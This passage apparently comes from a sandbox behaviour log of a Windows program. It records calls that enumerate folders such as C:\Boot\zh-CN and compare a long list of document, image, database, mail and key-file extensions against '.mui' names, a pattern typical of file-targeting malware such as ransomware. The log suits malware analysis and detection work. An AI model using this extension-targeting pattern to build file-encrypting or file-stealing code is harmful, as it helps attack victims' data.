(lpString1=".as", lpString2="mui") returned -1 [0033.048] lstrlenW (lpString=".asa") returned 4 [0033.048] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0033.048] lstrlenW (lpString=".asc") returned 4 [0033.048] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0033.048] lstrlenW (lpString=".ascx") returned 5 [0033.048] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1 [0033.048] lstrlenW (lpString=".asm") returned 4 [0033.048] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0033.048] lstrlenW (lpString=".asmx") returned 5 [0033.049] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1 [0033.049] lstrlenW (lpString=".asp") returned 4 [0033.049] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0033.049] lstrlenW (lpString=".aspx") returned 5 [0033.049] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1 [0033.049] lstrlenW (lpString=".asr") returned 4 [0033.049] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0033.049] lstrlenW (lpString=".asx") returned 4 [0033.049] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0033.049] lstrlenW (lpString=".avi") returned 4 [0033.049] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0033.049] lstrlenW (lpString=".avs") returned 4 [0033.049] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0033.049] lstrlenW (lpString=".backup") returned 7 [0033.049] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1 [0033.049] lstrlenW (lpString=".bak") returned 4 [0033.049] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0033.049] lstrlenW (lpString=".bay") returned 4 [0033.049] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0033.049] lstrlenW (lpString=".bd") returned 3 [0033.049] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0033.049] lstrlenW (lpString=".bin") returned 4 [0033.049] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0033.049] lstrlenW (lpString=".bmp") returned 4 [0033.049] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0033.049] lstrlenW (lpString=".bz2") returned 4 [0033.049] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0033.049] lstrlenW (lpString=".c") returned 2 [0033.049] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0033.049] lstrlenW (lpString=".cdr") returned 4 [0033.049] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0033.049] lstrlenW (lpString=".cer") returned 4 [0033.049] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0033.049] lstrlenW (lpString=".cf") returned 3 [0033.049] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0033.049] lstrlenW (lpString=".cfc") returned 4 [0033.050] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0033.050] lstrlenW (lpString=".cfm") returned 4 [0033.050] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0033.050] lstrlenW (lpString=".cfml") returned 5 [0033.050] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1 [0033.050] lstrlenW (lpString=".cfu") returned 4 [0033.050] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0033.050] lstrlenW (lpString=".chm") returned 4 [0033.050] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0033.050] lstrlenW (lpString=".cin") returned 4 [0033.050] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0033.050] lstrlenW (lpString=".class") returned 6 [0033.050] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1 [0033.050] lstrlenW (lpString=".clx") returned 4 [0033.050] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0033.050] lstrlenW (lpString=".config") returned 7 [0033.050] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1 [0033.050] lstrlenW (lpString=".cpp") returned 4 [0033.050] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0033.050] lstrlenW (lpString=".cr2") returned 4 [0033.050] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0033.050] lstrlenW (lpString=".crt") returned 4 [0033.050] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0033.050] lstrlenW (lpString=".crw") returned 4 [0033.050] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0033.050] lstrlenW (lpString=".cs") returned 3 [0033.050] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0033.050] lstrlenW (lpString=".css") returned 4 [0033.050] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0033.050] lstrlenW (lpString=".csv") returned 4 [0033.050] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0033.050] lstrlenW (lpString=".cub") returned 4 [0033.050] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0033.050] lstrlenW (lpString=".dae") returned 4 [0033.050] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0033.050] lstrlenW (lpString=".dat") returned 4 [0033.051] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0033.051] lstrlenW (lpString=".db") returned 3 [0033.051] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0033.051] lstrlenW (lpString=".dbf") returned 4 [0033.051] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0033.051] lstrlenW (lpString=".dbx") returned 4 [0033.051] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0033.051] lstrlenW (lpString=".dc3") returned 4 [0033.051] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0033.051] lstrlenW (lpString=".dcm") returned 4 [0033.051] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0033.051] lstrlenW (lpString=".dcr") returned 4 [0033.051] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0033.051] lstrlenW (lpString=".der") returned 4 [0033.051] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0033.051] lstrlenW (lpString=".dib") returned 4 [0033.051] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0033.051] lstrlenW (lpString=".dic") returned 4 [0033.051] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0033.051] lstrlenW (lpString=".dif") returned 4 [0033.051] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0033.051] lstrlenW (lpString=".divx") returned 5 [0033.051] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1 [0033.051] lstrlenW (lpString=".djvu") returned 5 [0033.051] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1 [0033.051] lstrlenW (lpString=".dng") returned 4 [0033.051] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0033.051] lstrlenW (lpString=".doc") returned 4 [0033.051] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0033.051] lstrlenW (lpString=".docm") returned 5 [0033.051] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1 [0033.051] lstrlenW (lpString=".docx") returned 5 [0033.051] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0033.051] lstrlenW (lpString=".dot") returned 4 [0033.052] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0033.052] lstrlenW (lpString=".dotm") returned 5 [0033.052] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1 [0033.052] lstrlenW (lpString=".dotx") returned 5 [0033.052] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1 [0033.052] lstrlenW (lpString=".dpx") returned 4 [0033.052] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0033.052] lstrlenW (lpString=".dqy") returned 4 [0033.052] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0033.052] lstrlenW (lpString=".dsn") returned 4 [0033.052] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0033.052] lstrlenW (lpString=".dt") returned 3 [0033.052] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0033.052] lstrlenW (lpString=".dtd") returned 4 [0033.052] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0033.052] lstrlenW (lpString=".dwg") returned 4 [0033.052] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0033.052] lstrlenW (lpString=".dwt") returned 4 [0033.052] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0033.052] lstrlenW (lpString=".dx") returned 3 [0033.052] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0033.052] lstrlenW (lpString=".dxf") returned 4 [0033.052] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0033.052] lstrlenW (lpString=".edml") returned 5 [0033.052] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1 [0033.052] lstrlenW (lpString=".efd") returned 4 [0033.052] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0033.052] lstrlenW (lpString=".elf") returned 4 [0033.052] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0033.052] lstrlenW (lpString=".emf") returned 4 [0033.052] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0033.052] lstrlenW (lpString=".emz") returned 4 [0033.052] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0033.052] lstrlenW (lpString=".epf") returned 4 [0033.052] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0033.053] lstrlenW (lpString=".eps") returned 4 [0033.053] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0033.053] lstrlenW (lpString=".epsf") returned 5 [0033.053] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1 [0033.053] lstrlenW (lpString=".epsp") returned 5 [0033.053] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1 [0033.053] lstrlenW (lpString=".erf") returned 4 [0033.053] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0033.053] lstrlenW (lpString=".exr") returned 4 [0033.053] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0033.053] lstrlenW (lpString=".f4v") returned 4 [0033.053] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0033.053] lstrlenW (lpString=".fido") returned 5 [0033.053] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1 [0033.053] lstrlenW (lpString=".flm") returned 4 [0033.053] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0033.053] lstrlenW (lpString=".flv") returned 4 [0033.053] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0033.053] lstrlenW (lpString=".frm") returned 4 [0033.053] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0033.053] lstrlenW (lpString=".fxg") returned 4 [0033.053] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0033.053] lstrlenW (lpString=".geo") returned 4 [0033.053] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0033.053] lstrlenW (lpString=".gif") returned 4 [0033.053] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0033.053] lstrlenW (lpString=".grs") returned 4 [0033.053] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0033.053] lstrlenW (lpString=".gz") returned 3 [0033.053] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0033.053] lstrlenW (lpString=".h") returned 2 [0033.053] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0033.053] lstrlenW (lpString=".hdr") returned 4 [0033.053] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0033.053] lstrlenW (lpString=".hpp") returned 4 [0033.054] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0033.054] lstrlenW (lpString=".hta") returned 4 [0033.054] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0033.054] lstrlenW (lpString=".htc") returned 4 [0033.054] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0033.054] lstrlenW (lpString=".htm") returned 4 [0033.054] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0033.054] lstrlenW (lpString=".html") returned 5 [0033.054] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1 [0033.054] lstrlenW (lpString=".icb") returned 4 [0033.054] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0033.054] lstrlenW (lpString=".ics") returned 4 [0033.054] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0033.054] lstrlenW (lpString=".iff") returned 4 [0033.054] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0033.054] lstrlenW (lpString=".inc") returned 4 [0033.054] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0033.054] lstrlenW (lpString=".indd") returned 5 [0033.054] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1 [0033.054] lstrlenW (lpString=".ini") returned 4 [0033.054] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0033.054] lstrlenW (lpString=".iqy") returned 4 [0033.054] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0033.054] lstrlenW (lpString=".j2c") returned 4 [0033.054] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0033.054] lstrlenW (lpString=".j2k") returned 4 [0033.054] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0033.054] lstrlenW (lpString=".java") returned 5 [0033.054] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1 [0033.054] lstrlenW (lpString=".jp2") returned 4 [0033.054] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0033.054] lstrlenW (lpString=".jpc") returned 4 [0033.054] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0033.054] lstrlenW (lpString=".jpe") returned 4 [0033.054] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0033.055] lstrlenW (lpString=".jpeg") returned 5 [0033.066] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1 [0033.066] lstrlenW (lpString=".jpf") returned 4 [0033.066] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0033.066] lstrlenW (lpString=".jpg") returned 4 [0033.066] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0033.066] lstrlenW (lpString=".jpx") returned 4 [0033.066] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0033.066] lstrlenW (lpString=".js") returned 3 [0033.066] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0033.066] lstrlenW (lpString=".jsf") returned 4 [0033.066] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0033.066] lstrlenW (lpString=".json") returned 5 [0033.066] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1 [0033.066] lstrlenW (lpString=".jsp") returned 4 [0033.066] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0033.066] lstrlenW (lpString=".kdc") returned 4 [0033.066] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0033.066] lstrlenW (lpString=".kmz") returned 4 [0033.066] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0033.066] lstrlenW (lpString=".kwm") returned 4 [0033.067] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0033.067] lstrlenW (lpString=".lasso") returned 6 [0033.067] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1 [0033.067] lstrlenW (lpString=".lbi") returned 4 [0033.067] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0033.067] lstrlenW (lpString=".lgf") returned 4 [0033.067] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0033.067] lstrlenW (lpString=".lgp") returned 4 [0033.067] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0033.067] lstrlenW (lpString=".log") returned 4 [0033.067] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0033.067] lstrlenW (lpString=".m1v") returned 4 [0033.067] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0033.067] lstrlenW (lpString=".m4a") returned 4 [0033.067] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0033.067] lstrlenW (lpString=".m4v") returned 4 [0033.067] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0033.067] lstrlenW (lpString=".max") returned 4 [0033.067] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0033.067] lstrlenW (lpString=".md") returned 3 [0033.067] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0033.067] lstrlenW (lpString=".mda") returned 4 [0033.067] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0033.067] lstrlenW (lpString=".mdb") returned 4 [0033.067] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0033.067] lstrlenW (lpString=".mde") returned 4 [0033.067] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0033.067] lstrlenW (lpString=".mdf") returned 4 [0033.067] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0033.067] lstrlenW (lpString=".mdw") returned 4 [0033.067] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0033.067] lstrlenW (lpString=".mef") returned 4 [0033.067] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0033.067] lstrlenW (lpString=".mft") returned 4 [0033.067] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0033.068] lstrlenW (lpString=".mfw") returned 4 [0033.068] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0033.068] lstrlenW (lpString=".mht") returned 4 [0033.068] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0033.068] lstrlenW (lpString=".mhtml") returned 6 [0033.068] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1 [0033.068] lstrlenW (lpString=".mka") returned 4 [0033.068] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0033.068] lstrlenW (lpString=".mkidx") returned 6 [0033.068] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1 [0033.068] lstrlenW (lpString=".mkv") returned 4 [0033.068] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0033.068] lstrlenW (lpString=".mos") returned 4 [0033.068] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0033.068] lstrlenW (lpString=".mov") returned 4 [0033.068] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0033.068] lstrlenW (lpString=".mp3") returned 4 [0033.068] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0033.068] lstrlenW (lpString=".mp4") returned 4 [0033.068] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0033.068] lstrlenW (lpString=".mpeg") returned 5 [0033.068] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1 [0033.068] lstrlenW (lpString=".mpg") returned 4 [0033.068] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0033.068] lstrlenW (lpString=".mpv") returned 4 [0033.068] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0033.068] lstrlenW (lpString=".mrw") returned 4 [0033.068] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0033.068] lstrlenW (lpString=".msg") returned 4 [0033.068] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0033.068] lstrlenW (lpString=".mxl") returned 4 [0033.068] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0033.068] lstrlenW (lpString=".myd") returned 4 [0033.068] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0033.068] lstrlenW (lpString=".myi") returned 4 [0033.068] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0033.069] lstrlenW (lpString=".nef") returned 4 [0033.069] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0033.069] lstrlenW (lpString=".nrw") returned 4 [0033.069] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0033.069] lstrlenW (lpString=".obj") returned 4 [0033.069] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0033.069] lstrlenW (lpString=".odb") returned 4 [0033.069] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0033.069] lstrlenW (lpString=".odc") returned 4 [0033.069] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0033.069] lstrlenW (lpString=".odm") returned 4 [0033.069] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0033.069] lstrlenW (lpString=".odp") returned 4 [0033.069] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0033.069] lstrlenW (lpString=".ods") returned 4 [0033.069] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0033.069] lstrlenW (lpString=".oft") returned 4 [0033.069] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0033.069] lstrlenW (lpString=".one") returned 4 [0033.069] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0033.069] lstrlenW (lpString=".onepkg") returned 7 [0033.069] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1 [0033.069] lstrlenW (lpString=".onetoc2") returned 8 [0033.069] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1 [0033.069] lstrlenW (lpString=".opt") returned 4 [0033.069] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0033.069] lstrlenW (lpString=".oqy") returned 4 [0033.069] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0033.069] lstrlenW (lpString=".orf") returned 4 [0033.069] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0033.069] lstrlenW (lpString=".p12") returned 4 [0033.069] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0033.069] lstrlenW (lpString=".p7b") returned 4 [0033.069] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0033.069] lstrlenW (lpString=".p7c") returned 4 [0033.069] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0033.070] lstrlenW (lpString=".pam") returned 4 [0033.070] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0033.070] lstrlenW (lpString=".pbm") returned 4 [0033.070] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0033.070] lstrlenW (lpString=".pct") returned 4 [0033.070] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0033.070] lstrlenW (lpString=".pcx") returned 4 [0033.070] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0033.070] lstrlenW (lpString=".pdd") returned 4 [0033.070] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0033.070] lstrlenW (lpString=".pdf") returned 4 [0033.070] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0033.070] lstrlenW (lpString=".pdp") returned 4 [0033.070] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0033.070] lstrlenW (lpString=".pef") returned 4 [0033.070] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0033.070] lstrlenW (lpString=".pem") returned 4 [0033.070] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0033.070] lstrlenW (lpString=".pff") returned 4 [0033.070] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0033.070] lstrlenW (lpString=".pfm") returned 4 [0033.070] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0033.070] lstrlenW (lpString=".pfx") returned 4 [0033.070] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0033.070] lstrlenW (lpString=".pgm") returned 4 [0033.070] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0033.070] lstrlenW (lpString=".php") returned 4 [0033.070] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0033.070] lstrlenW (lpString=".php3") returned 5 [0033.070] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1 [0033.070] lstrlenW (lpString=".php4") returned 5 [0033.070] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1 [0033.070] lstrlenW (lpString=".php5") returned 5 [0033.070] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1 [0033.071] lstrlenW (lpString=".phtml") returned 6 [0033.071] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1 [0033.071] lstrlenW (lpString=".pict") returned 5 [0033.071] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1 [0033.071] lstrlenW (lpString=".pl") returned 3 [0033.071] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0033.071] lstrlenW (lpString=".pls") returned 4 [0033.071] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0033.071] lstrlenW (lpString=".pm") returned 3 [0033.071] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0033.071] lstrlenW (lpString=".png") returned 4 [0033.071] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0033.071] lstrlenW (lpString=".pnm") returned 4 [0033.071] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0033.071] lstrlenW (lpString=".pot") returned 4 [0033.071] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0033.071] lstrlenW (lpString=".potm") returned 5 [0033.071] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1 [0033.071] lstrlenW (lpString=".potx") returned 5 [0033.071] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1 [0033.071] lstrlenW (lpString=".ppa") returned 4 [0033.071] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0033.071] lstrlenW (lpString=".ppam") returned 5 [0033.071] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1 [0033.071] lstrlenW (lpString=".ppm") returned 4 [0033.071] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0033.071] lstrlenW (lpString=".pps") returned 4 [0033.071] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0033.071] lstrlenW (lpString=".ppsm") returned 5 [0033.071] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1 [0033.071] lstrlenW (lpString=".ppt") returned 4 [0033.071] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0033.071] lstrlenW (lpString=".pptm") returned 5 [0033.071] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1 [0033.071] lstrlenW (lpString=".pptx") returned 5 [0033.072] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1 [0033.072] lstrlenW (lpString=".prn") returned 4 [0033.072] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0033.072] lstrlenW (lpString=".ps") returned 3 [0033.072] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0033.072] lstrlenW (lpString=".psb") returned 4 [0033.072] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0033.072] lstrlenW (lpString=".psd") returned 4 [0033.072] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0033.072] lstrlenW (lpString=".pst") returned 4 [0033.072] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0033.072] lstrlenW (lpString=".ptx") returned 4 [0033.072] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0033.072] lstrlenW (lpString=".pub") returned 4 [0033.072] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0033.072] lstrlenW (lpString=".pwm") returned 4 [0033.072] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0033.072] lstrlenW (lpString=".pxr") returned 4 [0033.072] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0033.072] lstrlenW (lpString=".py") returned 3 [0033.072] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0033.072] lstrlenW (lpString=".qt") returned 3 [0033.072] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0033.072] lstrlenW (lpString=".r3d") returned 4 [0033.072] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0033.073] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0033.073] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0033.073] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0033.073] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0033.073] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, 